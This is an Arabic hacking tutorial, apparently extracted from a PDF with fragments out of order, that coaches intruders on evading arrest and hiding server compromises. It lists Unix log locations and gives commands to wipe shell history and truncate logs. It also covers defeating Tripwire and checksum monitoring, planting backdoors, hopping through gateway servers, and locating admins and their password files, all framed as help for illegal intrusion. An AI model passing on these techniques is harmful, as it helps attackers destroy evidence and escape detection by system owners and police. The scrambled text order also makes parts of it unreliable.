-3‬هذا المر يطلب من السيرفر قبول المعلومات المرسله اليه كبديل عن المدخلت الموجودة حاليا‬ ‫)‪ (2‬نقاط الضعف‬ ‫نقاط الضعف التي يسببها سكريبت السي جي أي ليس ضعفا في السي جي أي نفسه و لكنه‬ ‫ضعف في بروتوكول الـ ‪ HTTP‬أو في أنظمة التشغيل المختلفة‬ ‫السي جي أي يسمح باستغلل نقاط الضعف الموجودة و لكن هناك طرق أخري للوصول الي تحطيم النظام‬ ‫المني ‪ .‬‬ ‫الموضوع ليس صغير و ليس بسهل في القراءه ‪ .

‬لكن انشاله سيكون دفعه للمام و ليس‬ ‫لن تخاف و تتراجع‬ ‫اسلوب الموضوع غريب ‪ .‬كما‬ ‫انه لبد من الحرص و فهم المور اذا كنت تريد ان تسمي نفسك هكر ‪ hacker‬بمعنى الكلمه‬ ‫ربما تعتقد في نفسك انك اكبر من قراءة هذا الموضوع بكثيير لنك من المعروفين عنهم بالحتراف او انك‬ ‫ترى ذلك في نفسك ‪ ...‬بمعنى اخر ‪ .‫هذا الموضوع سيجعلك تخاف من خيالك و تعمل الف حساب لظلك ‪ .‬؟‬ ‫و عندها سيتم السيطره على اجهزتك و ادواتك و مراقبتك !؟!‬ ‫يمكن يرى البعض ان هذا لم بحدث قط لي شخص نعرفه ؟ او ان بلدنا ليس فيها هذه التقنيات العاليه !! لكن‬ ‫هذا قد يحدث يوم ما !!‬ ‫و ايضا انت لتهاجم فقط سيرفرات بلدك انما سيرفرات اخرى عالميه محميه من قبل الشرطه الدوليه ‪ .‬‬ ‫************************‬ ‫اذا كنت تظن ان الحصول على ترجمة الثغرات ) ‪ ( exploites‬باسرع ما يمكن هو ما يجعلك محترفا و‬ ‫متطورا فاسمح لي بان اقول لك " انك انسان خاطئ و ان اسلوب تفكيرك غلط "‬ ‫ماذا ستفيدك الثغره الحديثه جدا ) ‪ ( 0day‬عندما يتم القبض عليك اذا هاجمت احدى السيرفرات الكبيره ‪ .‬‬ ‫الجزء الثالث ‪ :‬الساسيات التي يجب عليك معرفتها قبل ان تقوم باي عملية اختراق ) و سيتم عرضها من‬ ‫خلل النقاط التاليه (‬ ‫ تمهيد‬‫ امن نفسك‬‫ حسابك الخاص‬‫ ملفات اللوق ‪LoGs‬‬‫ ل تترك اي اثر‬‫ امور و اشياء يجب تجنبها و الحظر منها‬‫الجزء الرابع ‪ :‬التقنيات الحديثه الي يتي يجب ملحظتها ) و سيتم عرضه من خلل النقاط التاليه (‬ ‫ تمهيد‬‫ امنع تقفى اثرك من اي نوع‬‫ ايجاد اي نوع من انواع ملفات اللوق ‪ lOGs‬مهما كان فيها من تلعب ‪..‬‬‫ تحقق من ‪syslog configuration and logfile‬‬‫ تحقق من نوعيات برامج المن المثبته‬‫ تحقق من وجود المدراء ‪Admins‬‬‫ كيف يمكن تصحيح ‪checksum checking software‬‬‫ حيل المستخدم المنيه‬‫الجزء الخامس ‪ :‬ماذا تفعل ان وضعت تحت المراقبه‬ ‫الجزء السادس ‪ :‬ما الذي عليك القيام به و ايضا الذي لبد من عدم القيام به في حالة انه تم القبض عليك‬ ‫‪77‬‬ ..‬سيتم توضيح معناها و مفهومها مع شرح هذا الجزء‬ ‫انشاله ‪....‬لكن انا اؤكد لك بانك مخطئ و انت تحتاج لقراءة الموضوع الي النهايه‬ ‫************************‬ ‫الموضوع مقسم الى ‪ 8‬اجزاء ‪:‬‬ ‫=================‬ ‫الجزء الول ‪ :‬المقدمه ) و هو ماقد قمت انت بالنتهاء من قرائته حاليا (‬ ‫الجزء الثاني ‪ :‬المور العقليه و كيف تصبح **" ‪ " Paranoid‬هذا الجزء سيتم عرضه من خلل هذه‬ ‫المواضيع ‪:‬‬ ‫ الدافع او الحافز‬‫ لماذا ان لبد ان تصبح " ‪" Paraniod‬‬‫ كيف يمكن ان تصبح " ‪ " Paranoid‬؟‬‫ و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!‬‫** متاكد ان معظمكم يتسائل عن معنى هذه الكلمه ‪ .‬كل من اخواننا و اساتذتنا من كتبوا‬ ‫دروسا و شروحا في اختراق السيرفرات و المواقع كان همهم الوحيد في الحمايه هو مسح اللوق ‪log files‬‬ ‫‪ ..‬لكن هل هذا يجعلك في امان تام ؟! هل هذا سيمنع تتبع اثرك ؟!! هذا ما ستكتشفه بعد النتهاء من قراءة‬ ‫الموضوع ‪....‬و عادة ما نتجنبه دائما ‪ .

.‬العقل هو القوه التي ستدفعك و تحفزك لتصبح انسان واقعي ‪....‬عليك الهتمام بما ما قد يصيب اهلك ‪ .‬سليما ‪% 100‬‬ ‫ كيف تصبح " ‪ " Paranoid‬؟‬‫*********************‬ ‫اذا كنت قرأت ما سبق و اقتنعت به انت بالفعل اصبحت هذا الشخص " ‪ " Paranoid‬لكن القتناع وحده ل‬ ‫يكفي و التحمس وحده وليد اللحظه ايضا ليكفي ‪ .....‬فاحذر في كلمك على الهاتف لنه قد‬ ‫يكون مراقب ‪ ..‬‬ ‫************************‬ ‫الجز الثاني ‪:‬‬ ‫=======‬ ‫ الدافع و الحافز ‪:‬‬‫*************‬ ‫لبد من تحكيم العقل للنجاح في اي عمل ‪ ..‫الجزء السابع ‪ :‬قائمه بافضل البرامج للتخفي و الختباء‬ ‫الجزء الثامن ‪ :‬كلمه ختاميه ‪ .‬ابوك ‪ ......‬ما تراه انت‬ ‫بعينك المجرده انك تغير الصفحه الرئيسيه ‪ ...‬لكن في الحقيقه هي جريمه !!‬ ‫هل تعرف ماذا سينتظرك ان تم القبض عليك ؟!‬ ‫سيتم حرمانك من كل امور الكومبيوتر ‪ .‬‬ ‫مسئول و حريص‬ ‫المخترق ) ‪ ( Hacker‬الناجح لبد و ان تتوفر فيه هذه المبادىء و المكانيات العقليه ‪ .‬ستسدعى عند حصول اي مشاكل اخرى من هذا النوع ‪ ..‬او تقوم بتحميل بعض المعلومات من السيرفر هو شئ بسيط بل‬ ‫و سهل جدا‬ ‫ماذا لو انك اخترقت سيرفر معين و تم رصدك و تتبعك و القبض عليك من قبل الشرطه !؟! و انك سترمى في‬ ‫السجن كالسارقين و المجرمين‬ ‫ان كنت ل تهتم بما قد يحصل لك ‪ ..‬ارجو ان تتابعو الموضوع بحرض و تركيز شديدن من الن ‪!!! .‬او حتى بريديك الشخصي و اللكتروني ) لبد ان تعمل حساب الغير المتوقع (‬ ‫‪78‬‬ .‬‬ ‫يمكن ان نلخض ما ذكر من خلل الكلمات التاليه ‪ paraniod :‬تعني ان تصبح شديد الحذر و الشك في‬ ‫جميع الظروف‬ ‫لماذا يجب توخي الحذر بهذه الطريقه المخيفه ؟!!‬ ‫لن توقعك دائما الى اسوء الظروف يجعلك تسير في امان ‪ .‬نظرة الناس الغيير طبيعيه لك ) ليست نظرة اعجاب انما نظرة خوف‬ ‫( ‪ ......‬لذا فان‬ ‫معظم من يسقطون ل يقومون ثاني ابدا !!‬ ‫لذا فاصبح حذرا جدا و شكاكا ‪ ...‬‬ ‫اعمل حساب انك مراقب دائما و انه هناك كاميرا خفيه وراك دائما ‪ ........‬امك ‪ ..‬لبد ان تعرف لمن تقول هذه الحقيقه و كيف تتعامل مع الخرين ‪.‬و لن ما تفعله هو شئ كبيير جدا ‪ .‬امن نفسك‬ ‫اخذ جميع الحتياطات‬ ‫لتهتم بما قديقوله الكثيرون عنك بانك خواف او ما شابه‬ ‫اهتم باي ملف ‪ log‬مهما كانت قيمته تافهه‬ ‫لتصبح ‪ hacker‬عليك ان تقوم بعملك ‪ ..‬زوجتك‬ ‫و اطفالك ) ان كنت متزوج (‬ ‫ربما لتشعر بان ماتقوم به هو جريمه ‪ .‬انما لبد ان يكون القلق و التوتر موجودين بشكل دائم‬ ‫في حياتك ) اللكترونيه (‬ ‫اذا كنت فعل تريد ان تكون هكر حقيقي ‪ .‬مثلها مثل بناء‬ ‫عضلت الجسم لن يكبر الجسم و يتقسم ال بعد ممارسة الرياضه الخاصه بذلك ) على سبيل المثال (‬ ‫مهما كنت متمرس او لديك الكثيير من المعلومات لبد اخذ اشد الحتياطات و الحذر قبل القيام باي شئ‬ ‫ لماذا يجب ان تصبح " ‪ " Paranoid‬؟‬‫***************************‬ ‫كلمة " ‪ " Paranoia‬في اللغه النجليزيه تعني جنون الرتياب ) نزعه عند الفراد تجعلك تشك في جميع‬ ‫المور و جميع الشخاص (‬ ‫اعتقدان المور بدات تتضح لنا بعد معرفة اصل هذه الكلمه ‪.‬لن تحظى بفرص العمل التي تستحقها ‪ ..‬اخوتك ‪ .

‬لتبادل الخبار و الفكار ‪.‬ول تبعث اي ايميلت فيه‬ ‫معلومات مشبوهه و ل تمتلك اي معلومات امنيه و حساسه على جهازك فهذا ببساطه ل يشكل اي خوف لنه‬ ‫ببساطه ايضا انت لست مخترق او ‪(= hacker‬‬ ‫لنه لبد من وجود اتصال بينك و بين اصدقائك المهتمين بهذا المجال ‪ .33‬‬‫لتشفير الملفات بشكل فردي ) ملف بملف ( اليكم هذه البرامج ) الكثر شهره و الحسن اداء ( ‪:‬‬ ‫ ‪Triple DES‬‬‫ ‪IDEA‬‬‫ ‪(Blowfish (32 rounds‬‬‫ ‪file2file‬‬‫لتشفير اليميلت ‪:‬‬ ‫‪79‬‬ .5‬احدى انظمة التشغيل غير شائعة الستخدام‬‫خصوصا في عالمنا العربي (‬ ‫ لمستخدمين انظمة ال ‪ Unix‬اليكم ‪CFS v1...‬دعني اسألك هذه السئله ؟‬ ‫هل تريد ان يراك الخرين مجرم ؟ هل تريد ان ترى الحزن و الدموع على وجه اهلك ؟ هل تريد ان تحسر‬ ‫قلوبهم عليك ؟!‬ ‫هل تريد ان تفقد اصدقائك ؟ خطيبتك ؟ صحبتك ؟‬ ‫تذكر ان الضرر لن يعود عليك فقط انما سيعود على كل من تعرفه‬ ‫ و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!‬‫******************************************‬ ‫بما انك قد استوعبت ماذكر حتى الن و قررت ان تكون انسان حريص جدا ‪ ...4b‬‬‫ لمستخدمين نظام ‪ *Amiga‬اليكم ‪ * ) EnigmaII v1.‫اذا ما قد ذكرته ل يهمك و انك انسان غير مبالي ‪ .‬لبد ان تبقى هكذا طوال الوقت‬ ‫و تذكر هذه الكلمات ‪ :‬لحظة كسل واحده في اتخاذ الحتياطات المنيه قد تغير حياتك باكملها ؟!!!!‬ ‫دائما تذكر الدافع‬ ‫ الجزء الثالث ‪:‬‬‫=========‬ ‫ تمهيد‬‫******‬ ‫يجب معرفة هذه المور القادمه و استيعابها جيدا قبل ممارسة اي عملية اختراق ‪ .‬‬ ‫كما انه لبد و انك تمتلك بعض الملفات اللزمه للختراق او بعض المعلومات الي تعبر مدينه لك في حالة‬ ‫حدوث رصد لجهازك ) كبسه (‬ ‫>‪--‬‬ ‫‪<-‬‬‫قم بتشفير كل ما تملكه من معلومات حساسه ‪sensitive data‬‬ ‫يمكنك ذلك باستخدام بعض البرامج الموجوده مجانا على النترنت ‪ .‬حتى لو كنت مخترق‬ ‫متمرس لبد ان تستوعب الفكار القادمه‬ ‫ امن نفسك ‪:‬‬‫***********‬ ‫ ماذا لو قرأ ال ‪ SysAdmin‬رسائلك البريديه اللكترونيه ؟‬‫ ماذا لو كانت اتصالتك الهاتفيه مسجله و مراقبه من قبل الشرطه ؟‬‫ ماذا لو تم ضبط الكومبيوتر الشخصي و السيطره على كل معلوماتك ؟‬‫اذا كنت لتقوم بعمل اي اتصالت هاتفيه مع اي شخص من الهاكرز او الكراكرز ‪ .17‬او ‪SecureDrive 1..‬و هذه قائمه بافضل البرامج و التي‬ ‫تعتبر اختيار الهاكرز الول ‪:‬‬ ‫ لمستخدمين ‪ MsDos‬اليكم ‪ SFS v...

.x‬‬‫يمكنك ايضا تشفير عملية اتصالك ب ‪ ) Unix System‬على اساس انه ممكن ان تكون مراقب (‬ ‫و ذلك باستخدام ‪:‬‬ ‫ ‪ SSH‬المن حتى الن‬‫ ‪DES Login‬‬‫اجعل كلماتك السريه صعبة التخمين ‪ ..‬و يرى البعض انه فيما اقوله‬ ‫مبالغه !!! لكن انت ل تعرف ماذا يخبئ لك المستقبل !! فلماذا لتستعد من الن !!!‬ ‫كما انه هناك الكثيير من اخواننا العرب في دول الخارج الذي بالفعل تتوفر فيها اجهزة التنصت هذه ‪ ...‬‬ ‫اذا انت بالفعل متعمق جدا في الهاكينج فلبد من تشفير كل شئ يتعلق بهذه المور !!‬ ‫احفظ دائما نسخه احتياطيه من معلوماتك على ‪ CD‬او ‪ HD‬و بالطبع تكون مشفره حتى اذا خسرت‬ ‫المعلومات الموجوده على جهازك يكون لديك نسخ احتياطيه‬ ‫لتحتفظ بملفات لتحتاجها ‪ .‬المخابرات ‪ .‬او مشبوه بحسابتك الشخصيه التي فيها يكون اسمك الحقيقي و‬‫هويتك و تفصيلت كامله عنك‬ ‫ عمرك ما تحاول ان تتصل بموقع قد تم اختراقه بواسطة ال ‪telnet‬‬‫ يمكنك الشتراك بحسابك الخاص في قائمة البريد لي موقع امني ‪ security‬من دون خوف ‪.6.‫ ‪PGP v2..‬غير شائعه ‪ ..‬غير منطقيه ‪ .‬و ان كان لديك ‪ document files‬او ملفات مطبوعه و ل تريدها مرة اخرى‬ ‫لتقطعها اعتياديا انما احرقها في مكان بعيد كل البعد عن اماكن تواجدك العتياديه او ان اردت الحتفاظ بها‬ ‫فعليك كتابتها من جديد باسلوب مرمز او مشفر ليعرفه ال انت !!‬ ‫هل تعرف انه من الممكن ان ‪:‬‬ ‫=================‬ ‫تكون مراقب من ‪ :‬الشرطه ‪ .‬و‬ ‫على راي المثل المصري " امشي عدل يحتار عدوك فيك " فكلما كنت احتياطيا و حركاتك تحسبها بشكل‬ ‫صحيح !!! ففرص اطاحتك قليله جدا‬ ‫حساباتك و اشتراكات الشخصيه ‪:‬‬ ‫===================‬ ‫هنا سأتكلم عن حساباتك الشخصيه سواء كانت في العمل\المدرسه\الجامعه\اي كان فعليك بالتالي ‪:‬‬ ‫ ابدا ل تقوم باي عمل غيير قانوني ‪ .4‬احرف ( فاختر ال ‪ 8‬حروف‬ ‫ل تحفظ ارقام هواتف اصحابك الهاكرز بشكل اعتيادي ‪ ..‬اجعلها اكبر عدد ممكن من الحرف ) يعني عادة عند عمل اي اشتراك يطلب منك‬ ‫كلمه سريه تتكون من ‪ 8...‬انما يمكنك بان تشفرها ) حتى برموز تفهمها انت‬ ‫فقط ( و اتصل بهم من هواتف الشارع او من العمل ‪.‬لكن في نفس‬ ‫الوقت لبد ان تتذكرها دائما‬ ‫اخترها من كتاب تتمتلكه ‪ ..‬انما الهتمام بعكس السكيورتي هو المشكله ==< الهاكينج‬‫>‪----‬‬ ‫ملفات اللوق ‪: LoGS‬‬ ‫============‬ ‫‪80‬‬ .‬هاكرز اخرون و انهم يتسطيعون رصد كل حركات باستخدام وسائل‬ ‫حديثه ليمكن تخيلها‬ ‫مثل ‪:‬‬ ‫ اجهزه تصوير تستطيع تصويرك عند بعد مئات المتار‬‫ نقطة ليزر مصوبه نحو غرفتك للتصنت على مكالماتك‬‫ موجات عالية التردد للتنصت على لمسات و صوت يديك على ال ‪!! keyborad‬‬‫تختلف بالطبع هذه المكانيات من مكان لخر و من دوله الى اخرى ‪ .‬ل توجد في القواميس ‪ .....‬‬‫ لكن كل مو هو مختص بالهاكينج من ملفات لبد ان تشفر او انها يتم مسحها فورا‬‫ ابدا ل تحفظ اي برامج و ادوات الختراق على الهارديسك في حسابك الشخصي‬‫ بريدك الحقيقي لتعطيه ال لمن تثق فيه ثقه عمياء !!!!‬‫ اهتمامك بالسكيورتي ل يجعلك مشبوها ‪ .

‬اما اذا‬ ‫اردت ان تشتغل شغل المحترفين عليك الدخول و الخروج دون ان يلحظك اي شخص ‪ ..history‬‬ ‫‪: Backup Files‬‬ ‫‪~* .lastlog‬‬ ‫ل تترك اثرا ‪:‬‬ ‫=======‬ ‫كثيير من الهاكرز ينجحون في عملية حذف دخولهم من ملفات اللوق ‪ .letter.9‬مننا ) حتى انا كنت اقع في نفس هذا الخطا زمان ‪ .1 .logout‬‬ ‫‪echo mv save...‬لبد حذف دخولك من‬ ‫هذه الملفات و ال سيتم معرفة التي ‪:‬‬ ‫ ماذا قمت بالختراق !!‬‫ من اي مكان انت قادم‬‫ كم من الوقت بقيت اونلين ‪.logout‬‬ ‫‪echo rm -rf .dead.‬دون ان تقوم بتغيير‬ ‫اي شئ يلفت انتباه مدير النظام‬ ‫و لعمل ذلك تابع معي ‪:‬‬ ‫لتعتمد البرامج التي روجت على انها لتقوم بمسح اللوق انما تقوم بحذف دخولك فهي غيير مجديه مثل‬ ‫برنامج ‪ZAP (or ZAP2‬‬ ‫لنه يقوم بعمل اصفار كاخر لوق مكانك انت و هذا ايضا دليل على وجود خطا سيلحظه مدير النظام‬ ‫اذا عليك بالقيام بذلك يدويا ‪..logout>>.history‬‬ ‫‪ksh : .‬لكن اتعلمت ( و‬ ‫هو انك تمسح اللوقات ‪logfiles‬‬ ‫علطول ‪ .logout save..sh_history‬‬ ‫‪bash: .logout‬‬ ‫‪81‬‬ .‬‬‫خطا يقع فيه الجميع بنسبة ‪ % 99.‬لكنهم ينسون امرا هاما و قاتل !!! و‬ ‫هي الملفات التي توجد هنا‬ ‫‪tmp and $HOME/‬‬ ‫و جود ال ‪ Shell History‬في ‪ $HOME‬مصدر قلق كبيير ‪:‬‬ ‫‪: History files‬‬ ‫‪sh : .history>.‫هناك ‪ 3‬ملفات مهمه جدا ‪:‬‬ ‫ ‪ WTMP‬للتسجيل عند الدخول و الخروج ) ‪( log on/off .bash_history‬‬ ‫‪zsh : .‬هذا مجدي في حالة انك لتهتم بان يعرف الدمين انه هناك مخترق ما قد دخل على النظام ‪ ..‬‬ ‫عادة لبد ان تكوت ‪ root‬لتغير و تعدل في ال ‪ ) log files‬باستثناء بعض التوزيعات القديمه جدا (‬ ‫اماكن تواجد ملفات اللوق ‪ ) default‬تختلف باختلف التوزيع (‬ ‫‪UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬ ‫‪WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬ ‫‪LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log‬‬ ‫و في بعض النسخ القديمه ‪$home/.bak‬‬ ‫لكن الحل موجود ايضا لمسح ال ‪: History files‬‬ ‫‪mv .1‬‬ ‫‪echo rm -rf .. rlogin‬يتم تسجيلها في هذه الملفات ‪ .sh_history‬‬ ‫‪csh : .log in/logout + tty + host‬‬‫ ‪ UTMP‬للمتواجدين اونلين حاليا !‬‫ ‪ LASTLOG‬تسجيل من اين جاءت هذه ‪logins‬‬‫** سنتكلم عنهم باستفاضه و تعمق فيما بعد ) في جزء اخر من نفس الموضوع (‬ ‫كل عملية دخول بواسطة ال ‪ telnet .logout>>. ftp . *..

..‬عليك ان تعرف كيف تستخدم هذه التقنيات متعبا ما‬ ‫يلي ‪:‬‬ ‫ امنع تقفى اثرك من اي نوع‬‫**********************‬ ‫قد يلحظ الدمين ) مدير الشبكه ( وجودك كمخترق ‪ hacker‬و انك اطحت باحد المواقع لكن هذا ليهم ‪..host..‬‬ ‫المهم هو انه كيف سيرصدك و عندها كيف يمكن ان يتعامل معك !!!‬ ‫لذا ففي هذا الجزء سيتم توضيح كل الحتمالت و الساليب الذي يمكن بها تتبعك و رصدك و ايضا كيف يمكن‬ ‫ان تمنعها ‪...com‬‬ ‫و هكذا ‪.‫ امور و اشياء يجب تجنبها و الحظر منها‬‫======================‬ ‫لتقوم ابدا بكسر اي باسورد ال على ‪ encrypted partition‬كما عليك دائما انت تحذر من استخدام‬ ‫اشتراكاتك ) اشتراك الجامعه على سبيل المثال (‬ ‫لنه بمنتهى البساطه يمكن ان يرى ماتفعله مدير الشبكه ‪ admin‬و من ثم سيعرف مالذي تقوم به و الملفات‬ ‫التي تستخدمها الخ ‪....host.‬‬ ‫لتفكر في نفسك فقط ‪ ...‬يعني حين ان تستخدم بعض الشتراكات او ال ‪ shells‬التي تسمح بالعمل الخلفي‬ ‫‪ background‬لبد ان تعرف انك تبطئ من سرعة السيرفر و بالتالي تلفت النظار !!!‬ ‫حاول ان لتستخدم ‪ parametres‬على قدر المستطاع ‪ .‬قم بالتصال بال ‪ gateway server‬و من ثم تتصل بالسيرفر المراد‬ ‫اختراقه ‪..‬حيث انك في غنى عن التعديل في ملفات‬ ‫اللوق بشرط ان تدخل باشتراك مختلف في كل مره تدخل فيها على ال ‪(= hacked system‬‬ ‫ملحوظه ‪ :‬اذا كنت قادر على التصال بسرفيرات ‪ dialup‬كثييره فل حاجه لن تستخدم ‪hacking‬‬ ‫‪82‬‬ ..‬‬ ‫من الشيل الذي ستخترق منه ‪ .‬‬ ‫حاول دائما ان تغيير اسامي البرامج المشبوهه لديك يعني احنا العرب خصوصا غاويين نسمي اسماء اسامي‬ ‫مخيفه على الفاضي ‪..‬على سبيل المثال اذا اردت ان تتصل من الشيل‬ ‫على تيلنت لموقع معين او سيرفر معين لتقوم بعمل التي ‪telnet http://www.‬‬ ‫في حالة انك اخترقت سيرفر معين من الفضل ان تضع عليه ‪ backdoors‬مخصصه لنظام التشغيل ) مش‬ ‫‪ sub7‬هههههههههه ( و هي كثييره و موجوده مجانا على النترنت‬ ‫الجزء الرابع ‪ :‬التقنيات الحديثه الي يتي يجب ملحظتها‬ ‫===============================‬ ‫ تمهيد‬‫*******‬ ‫بعد ان ثبت اول ‪ sniffer‬و خططت لبدا الختراقات ‪ .com/ 23 :‬‬ ‫انما ببساطه اتبع الخطوات البطيئه و هي‬ ‫‪telnet‬‬ ‫‪open‬‬ ‫‪/http://www.‬‬ ‫==< ) تحتاج دائما ل ‪ root access‬لتغيير اللوق (‬ ‫باستخدامك ل ‪ Dialup server‬يجنبك الكثيير من المشاكل ‪ .‬‬ ‫* من الطبيعي ) العادي ( ان يسهل على مدير الشكبه ) ‪ ( admin‬معرفة النظام الذي كان المخترق عليه‬ ‫عند دخوله على شبكته و ذلك اما عن طريق ملفات اللوق ) هذا ان كان الهاكر غبي لتركها كما هي ( او من‬ ‫ال ‪ output‬من ال ‪sniffer‬‬ ‫او من اوامر ‪ netstat‬في حالة ان المخترق مازال موجودا ‪online‬‬ ‫من اجل هذا تختاج ال ‪!! GateWay Server‬‬ ‫* ‪ A gateway server in between‬هذا واحد من الكثيير من السيرفرات التي يوجد لك حساب‬ ‫عليها و التي تعتبر في منتهى السخافه في الستخدام و انت تحتاج لن تكون رووت عليها لتستطيع تغيير ال‬ ‫‪wtmp and lastlogs‬‬ ‫كما انه لبد ان من استخدام اكثر من ‪ gateway server‬و ان تبدل بينهم باستمرار حتى ل يتم الكشف‬ ‫عنك ‪..

..‬فيؤسفني انك لبد من اختراق‬ ‫هذه ‪hosts‬‬ ‫ملف ال ‪ syslog‬موجود في ‪/etc/syslog..‬للحصول و العثور على هذه‬ ‫الملفات يمكن ذلك بهاتين الطريقتين ‪:‬‬ ‫‪ .‫‪ server‬لنه سيتغير اثرك بتغير الشركات المختلفه التي تتصل من خللها‬ ‫بالنسبه للمتواجدين في الوليات المتحده المريكيه و اوروبا ) الدول المتقدمه ( حتى و ان قمت بما سبق )‬ ‫‪ ( dialup servers‬يمكنهم تسجيل كل اتصال تم و لديهم ارشيفات منذ سنيين هذا عددها !‬ ‫نتيجه و اختصار للنقطه السابقه موضحه بالرسم في الصوره التاليه ‪:‬‬ ‫ ايجاد اي نوع من انواع ملفات اللوق ‪ lOGs‬مهما كان فيها من تلعب ‪.‬حيث انه لبد من ان‬ ‫تخترق ال ‪ loghost‬لتعدل ملفات اللوق‬ ‫يمكن تعديل اللوق ‪ logfiles‬بعدة طرق ابسطها باستخدام اي محرر كتابه ‪ text editor‬او قم بعد اسطر‬ ‫الملف باستخدام ‪ wc‬و من ثم حذف اخر ‪ 10‬اسطر من خلل ‪"head -LineNumbersMinus10" :‬‬ ‫بالعربي ) عدد السطور مطروحا ‪ 10‬منه‪( head -‬‬ ‫اذا كان برنامج ‪ accouting‬مثبت على السيرفر يمكنك ببساطه استخدام ‪acct-cleaner from‬‬ ‫‪ zhart‬و هو هيعمل اللزم‬ ‫اذا كان النظام يستخدم ‪ wtmpx‬و ‪ utmpx‬ايضا فمع السف عزيز انت في ورطه !!! فانا على اعرف اي‬ ‫برنامج للتعامل في هذه الحاله ‪ ..2‬ابحث عن كل الملفات التي تغيرت ) حدث فيها تغيير ( من بعد دخولك ‪-‬‬ ‫بعد دخولك قم بعمل ‪ touch /tmp/check‬و بعدها قم "‪"find / -newer /tmp/check -print‬‬ ‫العمليه التي سنقوم بها ستاذخ الشكل التالي ‪ :‬بحث ‪ <-‬نتائج ‪ <-‬مطالعة النتائج ‪ <-‬تعديل‬ ‫قم ايضا بالتشيك على اماكن ال ‪ log files‬العتياديه ‪ /usr/adm‬و ‪ /var/adm‬و ‪/var/log‬‬ ‫اذا يتم تسجيل العمليات في ال ‪ loghost‬يعني ‪ xx@loghost‬فانت هنا في مازق ‪ .‬‬‫**************************************************‬ ‫***‬ ‫من الهام و الضروري جدا ان تعثر على كل ملفات اللوق حتى المخفي منها ‪ .conf‬‬ ‫‪83‬‬ ..‬لو استطعت ان تبرمج واحد ) للخوه المبرمجين ( ل تنسى ان تعلنا به =(‬ ‫ تحقق من ‪syslog configuration and logfile‬‬‫************************************‬ ‫تعتمد معظم البرامج على ال ‪ syslog function‬لتسجيل اي شئ يريدونه ‪ .1‬اعثر على جميع الملفات المفتوحه ‪ :‬و يمكنك ذلك باستخدام برنامج ‪ LSOF‬هو اختصار ‪List Open‬‬ ‫‪ Files‬و من ثم يمكن العثور عليهم و التعديل فيهم‬ ‫‪ ..‬فعليك ان تتحقق من‬ ‫خصائص ال ‪syslog‬‬ ‫فاذا كانت اللوقات ‪ logs‬لتخزن فقط على الجهاز انما على ‪ hosts‬اخرى ‪ ..

‬و إذا ماكانت أدوات أمنيه‬ ‫خفيه مستخدمه‪ . l5‬‬ ‫‪. tripwire. s3 etc‬‬ ‫ينبغي على المقتحم أن يتأكد من وجود هذه الدوات و التأكد من التقارير التي ترسلها ‪ .c.‬للتأكد من أنها ل‬ ‫تكشف عمليه القتحام‬ ‫يمكنك تعديل مفات هذه البرامج للتأكد من أنها لن تقوم بالبلغ عن القتحام‪ .‬كما يمكن ان يكون هناك ‪ sinnefer‬موضوع لغراض امنيه في نفس المكان‪.‬يمكنك معرفه كل المدراء على الموقع‪ ."crontab -l root‬‬ ‫غالبا ماتكون هذه الدوات محمله و عامله على حساب المدير‪ .bash_history‬لمعرفه الوامر التي يستعملونها عادة‪ .‬خاصه المخفيه منها قد تجد‬ ‫بعض الشياء المفيده حقا‬ ‫‪checksum checking software‬‬ ‫************************‬ ‫برامج ‪ ) checksum‬هو قيمة رقمية ُتستعمل للتأكد من خلو البيانات من الخطاء‪ .‬وتدار هذة البرامج‬ ‫بواسطه أداه تسمى ‪ cron‬و يكون مكانها الفتراضي أو الطبيعي هو ‪ /var/spool/cron/crontabs‬و‬ ‫هي تقوم بمتابعه جميع المدخلت ‪ . changeid.‬‬ ‫‪ profile/.‬و يمكن تنفيذ ذلك بطريقتين‪:‬‬ ‫ قم بتعديل البرنامج برمجيا لكي ل يقوم بالبلغ عنك )واسعه شويه دي( أو قم بأزالته و أستعمل برنامجا‬‫مزيفا‬ ‫ قد تضطر إلى أزاله الـ ‪ back door‬الذي أستعملته و محاوله تحميله بطريقه أخرى‬‫ تحقق من وجود المدراء ‪Admins‬‬‫****************************‬ ‫من المهم أن تجد جميع المدراء على الموقع‪ .‬و تحاول معرفه الحسابات العاديه التي يتم أستخدامها‪.‬و يكون بعضها في مجلد الـ ‪ ~/bin‬الخاص‬ ‫به‪ .‬للتحقق اللسريع من‬ ‫الموضوع نستخدم المر التالي‬ ‫"‪.‬و مدخلت الـ ‪alias‬‬‫أفحص ملف الـ ‪ sulog‬و حدد المستخدمين الذين نجحو في تنفيذ المر ‪ su root‬بنجاح‬‫ أسحب ملف الـ ‪ group‬و أبحث عن جميع المجموعات التي لها علقه بالداره ) ‪admin.login/. hobgoblin.‬‬ ‫توجد عده طرق لكشف هذه المعلومات‪:‬‬ ‫ قم بفحص الملف ‪ forword.‬هذه القيمة ُتحسب من‬ ‫خلل عملية كشف الجمع(‬ ‫بعض المدراء ويقمون باستعمال برامج للتحقق من حدوث اي تغييرات في الملفات‪ ،‬وفي حالة حدوث اي‬ ‫تغير‪ ،‬يقوم بفحص الملفات ويستطيع اكتشافها‬ ‫فكيف تعرف مااذا استخدمت هناك برامج التحقق واي النواع استخدمت؟ واذاعرفت فكيف تعدلها بحيث تخدم‬ ‫من اجلك ؟‬ ‫هناك انواع عديدة من برامج التحقق ومن السهل كتابة واحدة منها بنفسك ولكن من الصعب اكتشاف ما اذا‬ ‫استخدمت مثل تلك البرامج علي الملفات للحماية‬ ‫هذه اسماء بعض البرامج التي تقوم ب عملية فحص ‪checksum‬‬ ‫‪84‬‬ .‬أو أكتشاف معلومات مخفيه‪ .binaudit.‬خاصه الـ ‪ Root‬و الملفات التي يستعملها‪ .‬‬ ‫أستخدم أحدى الدوات التاليه ‪ chid.‬قد يفيدك هذا‬ ‫في معرفه دور المدير على الموقع‪ .‫ تحقق من نوعيات برامج المن المثبته‬‫******************************‬ ‫توجد العديد من برامج الفحص المني غالبا على المواقع ذات الحس المني العالي‪ .‬قم بفحص ملفات ‪.‬و أفحص الملفات‬ ‫التاليه ‪ history/. etc‬‬ ‫أسحب ملف ‪ passwd‬بالنسبه للمدير لعرض كلمات سر المدراء‬‫يعد كل هذا ‪ .‬و من الطبيعي طبعا أن تقوم بفحص كافه الملفات و المجلدات ‪ .‬أدخل إلى مجلداتهم الخاصه ) في حاله عدم أستطاعتك 